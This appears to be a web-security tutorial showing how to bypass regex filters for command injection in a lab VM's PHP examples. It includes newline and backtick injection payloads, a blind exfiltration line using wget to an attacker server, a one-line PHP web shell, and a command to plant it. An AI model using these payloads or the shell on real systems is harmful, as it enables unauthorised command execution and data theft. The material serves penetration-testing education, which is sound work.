Command Injection vulnerability in Web Applications : Part 2 | Bypass Security Checks

In this post we are gong to look at some of the security implementations and  data sanitization techniques used to mitigate the command injection vulnerability and also how to bypass them. For the basics of Command Injection vulnerability please visit my previous post :

        Command Injection : Part 1 | Introduction

Note : I am going to use Web for Pentester VM for the example. To install it on your system visit below link :

        http://www.sec-art.net/2018/03/how-to-install-web-for-pentester-vm-in.html

Example 1 : 

In example 1 code there is not any kind of security checks.

We can simply execute command.

 /commandexec/example1.php?ip=127.0.0.1; ls

Example1 is generic command injection.

Example 2 :

In example2, the regular expressions are used to filter out user input.

"preg_match()" is a built-in php function which is used to regular expression related tasks.

At the above regex :

• '^' denotes the start of line
• d{1,3} denotes the data should be decimal numbers between 1 to 3 digits in length
• '.' represents dot character
• '$' sign at last represents the end of line
• and '\' used in the whole regex are nothing but escape character which is used within regex.

The above regex only allow inputs within the form of IP address like : 127.0.0.1, 192.168.150.100 etc. But also note that there is 'm' character at end of the regex expression, which is nothing but multi-line modifier. In php Regex modifiers change how the regex engine applies the pattern to the given input string, and at here the multiline modifier basically changes the way the beginning (^) and end ($) of line characters behave. When the multiline modifier is absent, the ^ and $ characters act as the beginning and end of the string. the multiline modifier "m"  effect on the '$' character and with a line break we are able to create a match and inject our payload. Now at here we can use some illegal characters like "%0a" to break line and after that put our payload. Example :

 /commandexec/example2.php?ip=127.0.0.1%0als

And it works. Example2 is generic command injection.

Example3 :

Example3 has similar regular expression like example2.

But there are small difference, in example3 the multi-line modifier is not used. Means that we can not use line break method here.

In this situation we can use back-ticks `command` with the input. Example :

 /commandexec/example3.php?ip=127.0.0.1 `commnd_to_run`

When the above input get parsed, everything between back-ticks is executed first. At above example, the command between back-ticks are executed first, after that the whole input is parsed. This is known as command substitution. Since execution of the command between back-ticks takes precedence, it doesn’t matter if the command executed afterwards fails.

 /commandexec/example3.php?ip=127.0.0.1 `sleep 10`

And the command injection works. Since it is blind command injection, to extract data from the server we use below payload to send command output to our server.

 /commandexec/example3.php?ip=127.0.0.1 `wget http://attackerServer:Port/$(id)`

I am using a simple python server on port 8080.

and it also works.

Uploading web shell on vulnerable server :

We are going to use a very simple php shell.

Filename : shell.php

<?php
  $cmd = $_GET['cmd'];
  system($cmd);
?>

Payload :

 /commandexec/example3.php?ip=127.0.0.1 `wget http://attackerServer/shell.php`

On our file server, there is a file request from vulnerable server

Now executing command on target server.

 /commandexec/shell.php?cmd=command_name

Conclusion :

In this post we look at some techniques to bypass security checks in command injection vulnerability. Visit the link for more tutorials about Web Security :  http://www.sec-art.net/p/web-security.html